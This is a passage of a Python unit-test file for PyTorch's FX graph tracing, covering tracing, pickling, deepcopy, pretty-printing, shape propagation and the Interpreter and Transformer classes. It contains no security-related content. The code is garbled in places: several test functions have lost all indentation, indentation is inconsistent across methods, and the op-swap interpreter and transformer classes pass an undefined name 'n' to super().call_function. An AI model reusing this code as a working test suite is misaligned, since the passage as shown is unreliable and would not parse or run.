    import_copy = self.getExportImportCopy(scripted_lowered)
    imported_out = import_copy(x)
    torch.testing.assert_allclose(imported_out, ref_out)
def test_reserved_getattr(self):
    """Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
    class M(torch.nn.Module):
        def forward(self, a):
            return a.foo.bar.baz

    m = M()
    m_g = symbolic_trace(m)
    m_g.graph.lint()
    for node in m_g.graph.nodes:
        self.assertTrue(node.name != "getattr")

def test_node_tagging(self):
    """A Tracer subclass can attach arbitrary attributes to nodes during create_node."""
    class TaggingTracer(Tracer):
        def create_node(self, kind : str, target : Union[str, Callable],
                        args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
                        type_expr : Optional[Any] = None) -> Node:
            n = super().create_node(kind, target, args, kwargs, name)
            n.tag = 'foo'
            return n

    class M(torch.nn.Module):
        def forward(self, a, b):
            return a + b

    m = M()
    g = TaggingTracer().trace(m)
    g.lint()
    for n in g.nodes:
        self.assertTrue(hasattr(n, 'tag'))
        self.assertEqual(n.tag, 'foo')

def test_tensor_attribute(self):
    """Plain tensor attributes (not Parameters) are traceable, including via a nested qualname."""
    class TensorAttribute(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.tensor = torch.rand(3, 4)

        def forward(self, x):
            return torch.nn.functional.linear(x, self.tensor)

    ta = TensorAttribute()
    traced = symbolic_trace(ta)
    traced(torch.rand(4, 4))

    class WrapperForQualname(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.ta = TensorAttribute()

        def forward(self, x):
            # Attribute access two levels deep (self.ta.tensor).
            return torch.nn.functional.linear(x, self.ta.tensor)

    wfq = WrapperForQualname()
    traced2 = symbolic_trace(wfq)
    traced2.graph.lint()
    traced2(torch.rand(4, 4))

def test_symbolic_trace_sequential(self):
    """nn.Sequential containers trace correctly and match eager results."""
    class Simple(torch.nn.Module):
        def forward(self, x):
            return torch.neg(x)

    seq = torch.nn.Sequential(
        Simple(),
        Simple(),
        Simple()
    )
    traced = symbolic_trace(seq)
    traced.graph.lint()
    x = torch.rand(3, 4)
    self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
    def test_pickle_graphmodule(self):
        """A traced GraphModule with a submodule survives a pickle round-trip with identical outputs."""
        class Nested(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.st = torch.nn.Linear(4, 4)
            def forward(self, x):
                return self.st(x)
        n = Nested()
        traced = symbolic_trace(n)
        traced.graph.lint()
        pickled = pickle.dumps(traced)
        loaded = pickle.loads(pickled)
        loaded.graph.lint()
        x = torch.rand(3, 4)
        self.assertEqual(loaded(x), traced(x))
    def test_pickle_custom_import(self):
        """Pickling a GraphModule that calls a user-defined (non-torch) function
        preserves the import needed to resolve that function on load."""
        graph = torch.fx.Graph()
        a = graph.placeholder('x')
        b = graph.placeholder('y')
        # a_non_torch_leaf is a module-level helper defined elsewhere in this file.
        c = graph.call_function(a_non_torch_leaf, (a, b))
        d = graph.call_function(torch.sin, (c,))
        graph.output(d)
        gm = GraphModule(torch.nn.Module(), graph)
        pickled = pickle.dumps(gm)
        loaded = pickle.loads(pickled)
        loaded.graph.lint()
        x, y = torch.rand(1), torch.rand(1)
        self.assertEqual(loaded(x, y), gm(x, y))
    def test_all_input_nodes(self):
        """Node.all_input_nodes lists exactly the Nodes appearing in args/kwargs, in order."""
        graph : torch.fx.Graph = torch.fx.Graph()
        a : torch.fx.Node = graph.placeholder('x')
        b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
        c : torch.fx.Node = graph.get_attr('y_attr')
        d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
        e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
        graph.output(e)
        graph.lint()
        self.assertEqual(b.all_input_nodes, [a])
        # get_attr takes no Node inputs.
        self.assertEqual(c.all_input_nodes, [])
        self.assertEqual(d.all_input_nodes, [b, c])
        self.assertEqual(e.all_input_nodes, [d])
    def test_deepcopy_graphmodule_with_transform(self):
        """deepcopy of a transformed GraphModule produces a distinct class with identical behavior."""
        st = SimpleTest()
        traced = symbolic_trace(st)
        traced.graph.lint()
        def transform(traced):
            # Copy the traced graph, then append a call_method('neg') on its output.
            new_graph = torch.fx.Graph()
            val_map : Dict[Node, Node] = {}
            output_value = new_graph.graph_copy(traced.graph, val_map)
            relu_out = new_graph.create_node(
                op='call_method', target='neg', args=(output_value,), kwargs={})
            new_graph.output(relu_out)
            return GraphModule(traced, new_graph)
        transformed = transform(traced)
        transformed.graph.lint()
        copied = copy.deepcopy(transformed)
        # GraphModule generates a per-instance class; the copy must not share it.
        self.assertNotEqual(id(type(transformed)), id(type(copied)))
        x = torch.randn(3, 4)
        self.assertEqual(copied(x), transformed(x))
    def test_deepcopy_with_submods_params(self):
        """deepcopy of a traced module with Parameters at multiple nesting levels yields a lintable graph."""
        class Bar(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.param = torch.nn.Parameter(torch.rand(3, 4))
            def forward(self, x):
                return torch.relu(x) + self.param
        class Baz(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.param = torch.nn.Parameter(torch.rand(3, 4))
                self.bar = Bar()
            def forward(self, x):
                return self.bar(x) - self.param
        baz = Baz()
        traced = symbolic_trace(baz)
        traced.graph.lint()
        copied = copy.deepcopy(traced)
        copied.graph.lint()
    def test_unpack_list_better_error(self):
        """Star-unpacking a Proxy (``*x``) raises a TraceError with a helpful message."""
        class SomeArgs(torch.nn.Module):
            def forward(self, a, b):
                return torch.rand(3, 4)
        class UnpacksList(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.sa = SomeArgs()
            def forward(self, x : list):
                # Iterating a Proxy is unsupported; tracing must fail clearly here.
                return self.sa(*x)
        ul = UnpacksList()
        with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
            symbolic_trace(ul)
    def test_unpack_dict_better_error(self):
        """Double-star-unpacking a Proxy (``**x``) raises a TraceError with a helpful message."""
        class SomeKwargs(torch.nn.Module):
            def forward(self, x=3, y=4):
                return torch.rand(3, 4)
        class UnpacksDict(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.sk = SomeKwargs()
            def forward(self, x : dict):
                # Dict-unpacking a Proxy is unsupported; tracing must fail clearly here.
                return self.sk(**x)
        ud = UnpacksDict()
        with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
            symbolic_trace(ud)
    def test_pretty_print_targets(self):
        """Graph pretty-printing uses qualified friendly names for builtin/operator/torch targets."""
        # Test that Graph pretty-print prints friendly name for targets
        # in `operator` and `builtins`
        class SomeMod(torch.nn.Module):
            def forward(self, x):
                # x.foo/x.bar become builtins.getattr calls; + is operator.add.
                return torch.add(x.foo + x.bar, 3.0)
        traced = symbolic_trace(SomeMod())
        graph_str = str(traced.graph)
        self.assertIn('builtins.getattr', graph_str)
        self.assertIn('operator.add', graph_str)
        self.assertIn('torch.add', graph_str)
    def test_pretty_print_node(self):
        """Node.format_node() renders every opcode kind with its name and op label, in graph order."""
        class M(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.param: torch.nn.Parameter = torch.nn.Parameter(
                    torch.rand(3, 4))
                self.linear = torch.nn.Linear(4, 5)
            def forward(self, x: torch.Tensor, y: int = 2):
                # Exercises placeholder, call_function (getitem/add), get_attr,
                # call_module (linear), and call_method (clamp) in one graph.
                return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
        traced = symbolic_trace(M())
        all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
        FileCheck().check("x").check("placeholder") \
            .check("y").check("placeholder") \
            .check("getitem").check("call_function") \
            .check("param").check("get_attr") \
            .check("add").check("call_function") \
            .check("linear").check("call_module") \
            .check("clamp").check("call_method") \
            .run(all_formatted)
    def test_script_tensor_constant(self):
        """Anonymous tensor constants must use a single-underscore name so TorchScript keeps them."""
        # TorchScript seems to ignore attributes that start with `__`.
        # We used to call anonymous Tensor values `__tensor_constant*`, but
        # they were getting ignored by script. Now they're called
        # `_tensor_constant*`
        class IHaveATensorConstant(torch.nn.Module):
            def forward(self, x):
                return x + torch.rand(3, 4)
        traced = torch.fx.symbolic_trace(IHaveATensorConstant())
        torch.jit.script(traced)
    def test_torch_fx_len(self):
        """len() on a Proxy traces correctly, remains scriptable, and the
        global builtin `len` is left untouched after tracing."""
        class FXLenTest(torch.nn.Module):
            def forward(self, x):
                return len(x)
        traced = symbolic_trace(FXLenTest())
        # len of a (3, 4) tensor is its first dimension, 3.
        self.assertEqual(traced(torch.rand(3, 4)), 3)
        # Test scriptability
        scripted = torch.jit.script(FXLenTest())
        self.assertEqual(scripted(torch.rand(3)), 3)
        traced_scripted = torch.jit.script(traced)
        self.assertEqual(traced_scripted(torch.rand(3)), 3)
        # Test non-proxy len
        class FXLenTest2(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.l = [3, 4, 5]
            def forward(self, x):
                # len() of a concrete list is evaluated eagerly during tracing.
                return x + len(self.l)
        traced2 = symbolic_trace(FXLenTest2())
        inp = torch.rand(3, 4)
        self.assertEqual(traced2(inp), inp + 3.0)
        # Tracing must not leave a patched version of the builtin behind.
        self.assertIs(len, builtins.len)
    def test_sqrt(self):
        """math.sqrt (imported bare and qualified) traces on both Proxy and
        concrete values, and the patched functions are restored afterwards."""
        class Sqrt1(torch.nn.Module):
            def forward(self, x):
                return sqrt(x.size(0))
        class Sqrt2(torch.nn.Module):
            def forward(self, x):
                return math.sqrt(x.size(0))
        class Sqrt3(torch.nn.Module):
            def forward(self, x):
                # Mixes a concrete sqrt(2) with qualified and bare call forms.
                return x + math.sqrt(2) + sqrt(2)
        self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
        self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
        self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
        # Tracing must not leave a patched sqrt behind (_sqrt is the original).
        self.assertIs(sqrt, _sqrt)
        self.assertIs(math.sqrt, _sqrt)
    def test_torch_custom_ops(self):
        """torch.ops.aten.* custom-op calls trace and run with results matching eager mode."""
        class M(torch.nn.Module):
            def forward(self, a):
                b = torch.ops.aten.sigmoid(a)
                # Exercise both list and tuple argument forms of aten.cat.
                c = torch.ops.aten.cat([a, b])
                return torch.ops.aten.cat((c, c))
        m = M()
        input = torch.randn(3)
        ref_out = m(input)
        gm = symbolic_trace(m)
        gm.graph.lint()
        out = gm(input)
        self.assertEqual(out, ref_out)
    def test_pickle_torch_custom_ops(self):
        """A GraphModule containing torch.ops.aten.* calls survives a pickle round-trip."""
        class M(torch.nn.Module):
            def forward(self, a):
                b = torch.ops.aten.sigmoid(a)
                c = torch.ops.aten.cat([a, b])
                return torch.ops.aten.cat((c, c))
        m = M()
        input = torch.randn(3)
        ref_out = m(input)
        gm = symbolic_trace(m)
        gm.graph.lint()
        pickled = pickle.dumps(gm)
        loaded = pickle.loads(pickled)
        self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
    def test_custom_proxy_type(self):
        """A plain user class (no ProxyableClassMeta) passes through tracing as
        an opaque value when only used as function inputs/outputs."""
        class TensorPair:
            def __init__(self, left, right):
                self.left, self.right = left, right
            def add(self, other):
                l = self.left + other.left
                r = self.right + other.right
                return TensorPair(l, r)
            def mul(self, other):
                l = self.left * other.left
                r = self.right * other.right
                return TensorPair(l, r)
        def use_tensor_pair(x : TensorPair, y : TensorPair):
            s = x.add(y)
            return s.mul(x)
        x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
        y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
        ref_out = use_tensor_pair(x, y)
        traced = symbolic_trace(use_tensor_pair)
        traced_out = traced(x, y)
        self.assertEqual(traced_out.left, ref_out.left)
        self.assertEqual(traced_out.right, ref_out.right)
    def test_custom_proxy_type_literal(self):
        """A ProxyableClassMeta class constructed from literals inside the traced
        function is recorded in the graph and produces matching results."""
        class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
            def __init__(self, left, right):
                self.left, self.right = left, right
            def add(self, other):
                l = self.left + other.left
                r = self.right + other.right
                return TensorPair(l, r)
            def mul(self, other):
                l = self.left * other.left
                r = self.right * other.right
                return TensorPair(l, r)
        def use_tensor_pair_literal(x : TensorPair):
            # The TensorPair constructed here from constant tensors is itself traced.
            s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
            return s.mul(x)
        x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
        ref_out = use_tensor_pair_literal(x)
        traced = symbolic_trace(use_tensor_pair_literal)
        traced_out = traced(x)
        self.assertEqual(traced_out.left, ref_out.left)
        self.assertEqual(traced_out.right, ref_out.right)
    def test_custom_proxy_dynamic_value(self):
        """A ProxyableClassMeta class constructed from a Proxy (dynamic) value
        traces correctly and matches eager execution."""
        class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
            def __init__(self, left, right):
                self.left, self.right = left, right
            def add(self, other):
                l = self.left + other.left
                r = self.right + other.right
                return TensorPair(l, r)
            def mul(self, other):
                l = self.left * other.left
                r = self.right * other.right
                return TensorPair(l, r)
        def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
            # y is a traced Proxy here, so the TensorPair ctor sees dynamic values.
            s = x.add(TensorPair(y, y))
            return s.mul(x)
        x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
        y = torch.randn(5, 3)
        ref_out = use_tensor_pair_ctor(x, y)
        traced = symbolic_trace(use_tensor_pair_ctor)
        traced_out = traced(x, y)
        self.assertEqual(traced_out.left, ref_out.left)
        self.assertEqual(traced_out.right, ref_out.right)
    def test_custom_proxy_input_dependent_control_flow(self):
        """A ProxyableClassMeta __init__ containing input-dependent control flow
        still traces, with the branch resolved at trace time."""
        class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
            def __init__(self, inp):
                # NOTE(review): during tracing, inp.sum() == 0 compares a Proxy,
                # so this branch choice is baked into the traced graph.
                if inp.sum() == 0:
                    self.is_zero = True
                    self.tensor = torch.tensor([])
                else:
                    self.is_zero = False
                    self.tensor = inp
            def add(self, other):
                if self.is_zero:
                    return ZeroTensor(other.tensor)
                elif other.is_zero:
                    return self
        def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
            return ZeroTensor(x + y)
        x, y = torch.randn(5, 3), torch.randn(5, 3)
        ref_out = use_zero_tensor(x, y)
        traced = symbolic_trace(use_zero_tensor)
        traced_out = traced(x, y)
        self.assertEqual(traced_out.is_zero, ref_out.is_zero)
        self.assertEqual(traced_out.tensor, ref_out.tensor)
    def test_graph_fns(self):
        """Build a graph manually with every node-creation helper (placeholder,
        call_module, get_attr, call_method, call_function) and check execution."""
        g = Graph()
        a = g.placeholder('a')
        b = g.call_module('linear', (a,))
        c = g.get_attr('bias')
        d = g.call_method('add', (b, c))
        e = g.call_function(torch.sin, (d,))
        g.output(e)
        mod = torch.nn.Module()
        mod.linear = torch.nn.Linear(3, 4)
        mod.bias = torch.rand(4)
        gm = GraphModule(mod, g)
        gm.graph.lint()
        input = torch.rand(3)
        r = gm(input)
        ref = torch.sin(mod.linear(input) + mod.bias)
        self.assertEqual(r, ref)
    def test_remove_uses(self):
        """replace_all_uses_with + erase_node removes the erased node from its input's users map."""
        g : torch.fx.Graph = Graph()
        x : torch.fx.Node = g.placeholder('x')
        relu : torch.fx.Node = g.call_function(torch.relu, (x,))
        neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
        g.output(neg)
        # Redirect neg's users (the output) to relu, making neg dead.
        neg.replace_all_uses_with(relu)
        g.erase_node(neg)
        self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
    def test_pickle_nonetype_annotation(self):
        """A traced EmbeddingBag (None-valued annotations in its signature) survives pickling."""
        eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
        traced = symbolic_trace(eb)
        pickled = pickle.dumps(traced)
        loaded = pickle.loads(pickled)
        loaded.graph.lint()
        input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
        offsets = torch.LongTensor([0, 4])
        self.assertEqual(loaded(input, offsets), traced(input, offsets))
    def test_return_tuple(self):
        """forward() returning a tuple traces and matches eager output."""
        class M(torch.nn.Module):
            def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
                return (x, x + x)
        original = M()
        traced = symbolic_trace(original)
        self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
    def test_construct_root_dict(self):
        """GraphModule accepts a dict root mapping dotted qualified names to
        submodules/tensors, materializing the intermediate module hierarchy."""
        graph : torch.fx.Graph = torch.fx.Graph()
        a : torch.fx.Node = graph.create_node('placeholder', 'x')
        b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
        c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
        d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
        graph.output(d)
        linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
        add_param : torch.Tensor = torch.rand(3, 4)
        gm : torch.fx.GraphModule = torch.fx.GraphModule(
            {'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
        gm.graph.lint()
        # Generated code should reference the full dotted path.
        assert 'self.foo.bar.baz' in gm.code
        x : torch.Tensor = torch.rand(3, 3)
        out : torch.Tensor = gm(x)
        ref_out : torch.Tensor = linear_mod(x) + add_param
        self.assertEqual(out, ref_out)
    def test_symbolic_trace_assert(self):
        """torch._assert is traceable, fires at runtime on the traced module, and stays scriptable."""
        class AssertsTensorShape(torch.nn.Module):
            def forward(self, x):
                torch._assert(x.shape[1] > 4, "assert_foobar")
                return x
        m = AssertsTensorShape()
        # verify traceability
        traced = symbolic_trace(m)
        # verify assertion on traced model works correctly at runtime
        traced(torch.rand(4, 5))
        with self.assertRaisesRegex(AssertionError, "assert_foobar"):
            traced(torch.rand(4, 3))
        # verify the symbolically traced module is scriptable
        ms = torch.jit.script(m)
        with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
            ms(torch.rand(4, 3))
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
    def test_copy_no_remap(self):
        """node_copy without an arg-remapping function leaves nodes pointing at the
        old Graph, which lint() must reject."""
        traced = symbolic_trace(SimpleTest())
        g = traced.graph
        copied = torch.fx.Graph()
        for node in g.nodes:
            copied.node_copy(node)
        with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
            copied.lint()
    def test_wrong_topo(self):
        """lint() detects a use-before-definition after nodes are reordered out of topological order."""
        graph : torch.fx.Graph = torch.fx.Graph()
        a : torch.fx.Node = graph.create_node('placeholder', 'x')
        b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
        c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
        d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
        graph.output(d)
        nodes = list(graph.nodes)
        # Move node 2 (an input of node 3) to after node 3, breaking topo order.
        nodes[3].append(nodes[2])
        with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
            graph.lint()
    def test_example_shape_prop(self):
        """ShapeProp annotates tensor_meta (shape/stride) across a graph that
        exercises every opcode, and the output metadata matches eager results."""
        class TestCase(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.attr = torch.randn(3, 4)
                self.submod = torch.nn.Linear(4, 4)
            def forward(self, x):
                return torch.neg(self.submod(x.relu() + self.attr))
        tc = TestCase()
        tc_traced = symbolic_trace(tc)
        ref_out = tc_traced(torch.rand(3, 4))
        shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
        # Make sure we're testing all opcodes
        opcodes = set()
        output_shape : Optional[torch.Size] = None
        output_stride : Optional[Tuple[int]] = None
        for node in tc_traced.graph.nodes:
            opcodes.add(node.op)
            if node.op == 'output':
                output_shape = node.args[0].meta['tensor_meta'].shape
                output_stride = node.args[0].meta['tensor_meta'].stride
        self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
                                       'call_module', 'output']))
        # Test shape propagation and make sure results match actual
        self.assertEqual(output_shape, ref_out.shape)
        self.assertEqual(output_stride, ref_out.stride())
    def test_shape_prop_layout(self):
        """ShapeProp records memory_format, for both contiguous and channels_last inputs."""
        class ConvTest(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.conv_mod = torch.nn.Conv2d(5, 5, 3)
            def forward(self, x):
                return self.conv_mod(x)
        # contiguous layout
        test_mod = ConvTest()
        traced = symbolic_trace(test_mod)
        x = torch.randn(5, 5, 224, 224)
        shape_prop.ShapeProp(traced).propagate(x)
        assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
                   for node in traced.graph.nodes))
        x_channels_last = x.contiguous(memory_format=torch.channels_last)
        traced.to(memory_format=torch.channels_last)
        shape_prop.ShapeProp(traced).propagate(x_channels_last)
        for node in traced.graph.nodes:
            # NB: the implementation of conv may not preserve the memory format,
            # unfortunately. The best we can do is just check that the placeholder
            # node is channels-last
            if node.op in {'placeholder'}:
                self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
    def test_shape_prop_aggregate(self):
        """ShapeProp handles a leaf module returning an aggregate (tuple) value,
        recording per-element metadata."""
        class ReturnTwo(torch.nn.Module):
            def forward(self, x):
                return (3, torch.sum(x))
        class UnderTest(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.rt = ReturnTwo()
            def forward(self, x):
                return self.rt(x)
        ut = UnderTest()
        class RTTracer(torch.fx.Tracer):
            def is_leaf_module(self, m, module_qualified_name):
                # Keep ReturnTwo opaque so its tuple return stays a single call_module.
                return type(m) is ReturnTwo
        graph = RTTracer().trace(ut)
        mod = torch.fx.GraphModule(ut, graph)
        shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
        for node in mod.graph.nodes:
            if node.op == 'call_module':
                assert 'tensor_meta' in node.meta
                tensor_meta = node.meta['tensor_meta']
                # First element is the int 3; second is the scalar sum tensor.
                assert tensor_meta[0] == 3
                assert tensor_meta[1].shape == torch.Size([])
    def test_shape_prop_layout_3d(self):
        """Same as test_shape_prop_layout but for Conv3d with channels_last_3d."""
        class ConvTest3d(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.conv_mod = torch.nn.Conv3d(5, 5, 3)
            def forward(self, x):
                return self.conv_mod(x)
        test_mod_3d = ConvTest3d()
        traced_3d = symbolic_trace(test_mod_3d)
        x_3d = torch.randn(5, 5, 224, 224, 15)
        shape_prop.ShapeProp(traced_3d).propagate(x_3d)
        assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
                   for node in traced_3d.graph.nodes))
        x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
        traced_3d.to(memory_format=torch.channels_last_3d)
        shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
        for node in traced_3d.graph.nodes:
            # NB: the implementation of conv may not preserve the memory format,
            # unfortunately. The best we can do is just check that the placeholder
            # node is channels-last
            if node.op in {'placeholder'}:
                self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
    def test_interpreter(self):
        """Interpreter.run over a traced module matches both the GraphModule and the eager module."""
        class MyModule(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.param = torch.nn.Parameter(torch.rand(3, 4))
                self.linear = torch.nn.Linear(4, 5)
            def forward(self, x):
                return self.linear(x + self.param).clamp(min=0.0, max=1.0)
        m = MyModule()
        gm = torch.fx.symbolic_trace(m)
        interpreter = Interpreter(gm)
        input = torch.randn(3, 4)
        self.assertEqual(interpreter.run(input), gm(input))
        self.assertEqual(interpreter.run(input), m(input))
    def test_interpreter_run_node_override(self):
        """Overriding Interpreter.run_node can observe/annotate every node during execution."""
        class MyModule(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.param = torch.nn.Parameter(torch.rand(3, 4))
                self.linear = torch.nn.Linear(4, 5)
            def forward(self, x):
                return self.linear(x + self.param).clamp(min=0.0, max=1.0)
        m = MyModule()
        gm = torch.fx.symbolic_trace(m)
        class RunNodeInterpreter(Interpreter):
            def __init__(self, module):
                super().__init__(module)
            def run_node(self, n : Node) -> Any:
                # Stash each node's computed value on the node itself.
                result = super().run_node(n)
                n.cached_value = result
                return result
        input = torch.randn(3, 4)
        RunNodeInterpreter(gm).run(input)
        for node in gm.graph.nodes:
            assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
    def test_interpreter_partial_eval(self):
        """Interpreter.run with initial_env pre-seeds a node's value, skipping its computation."""
        class MyModule(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.param = torch.nn.Parameter(torch.rand(3, 4))
                self.linear = torch.nn.Linear(4, 5)
            def forward(self, x):
                return self.linear(x + self.param).clamp(min=0.0, max=1.0)
        gm = torch.fx.symbolic_trace(MyModule())
        interp = Interpreter(gm)
        env = {}
        # Pin the linear node's output to a known tensor.
        for node in gm.graph.nodes:
            if node.op == 'call_module' and node.target == 'linear':
                env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
                break
        assert len(env) == 1
        x = torch.randn(3, 4)
        result = interp.run(x, initial_env=env)
        # Only the downstream clamp should have been applied to the pinned value.
        self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
    def test_interpreter_star_args(self):
        """Interpreter handles a traced function with a *args placeholder."""
        def with_star_args(x, *args):
            return x + args[0]
        gm = torch.fx.symbolic_trace(with_star_args)
        interp = Interpreter(gm)
        result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
        self.assertEqual(result, torch.ones(3, 4) * 2.0)
    @skipIfNoTorchVision
    def test_interpreter_noop_resnet18(self):
        """A no-op Transformer pass over traced ResNet-18 preserves outputs."""
        rn18 = torchvision_models.resnet18()
        transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
        inp = torch.randn(5, 3, 224, 224)
        self.assertEqual(transformed(inp), rn18(inp))
    @skipIfNoTorchVision
    def test_interpreter_gc_values(self):
        """Interpreter frees intermediate values after their last use; only the output remains in env."""
        rn18 = torchvision_models.resnet18()
        interp = Interpreter(symbolic_trace(rn18))
        inp = torch.rand(5, 3, 224, 224)
        out = interp.run(inp)
        env_key_names = set(n.name for n in interp.env.keys())
        self.assertEqual(env_key_names, set(['output']))
    def test_transformer_noop(self):
        """A default (no-override) Transformer pass reproduces the original module's behavior."""
        class MyModule(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.param = torch.nn.Parameter(torch.rand(3, 4))
                self.linear = torch.nn.Linear(4, 5)
            def forward(self, x):
                return self.linear(x + self.param).clamp(min=0.0, max=1.0)
        m = MyModule()
        gm = torch.fx.symbolic_trace(m)
        new_gm = Transformer(gm).transform()
        input = torch.randn(3, 4)
        self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
    def test_transformer_multi_outputs(self):
        """Transformer handles a forward() returning multiple outputs."""
        class MyModule(torch.nn.Module):
            def __init__(self):
                super().__init__()
                self.param = torch.nn.Parameter(torch.rand(3, 4))
                self.linear = torch.nn.Linear(4, 5)
            def forward(self, x):
                x = x + self.param
                out = self.linear(x)
                return x, out
        m = MyModule()
        gm = torch.fx.symbolic_trace(m)
        new_gm = Transformer(gm).transform()
        input = torch.randn(3, 4)
        self.assertEqual(new_gm(input), gm(input))
    def test_fn_type_annotations(self):
        """Parameter/return annotations on forward() (incl. a NamedTuple arg) are
        preserved through tracing so the result stays scriptable."""
        class Foo(torch.nn.Module):
            def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
                return {'a': p.x + p.y + z + i}
        foo_scripted = torch.jit.script(Foo())
        foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
        fxed = symbolic_trace(Foo())
        fxed_scripted = torch.jit.script(fxed)
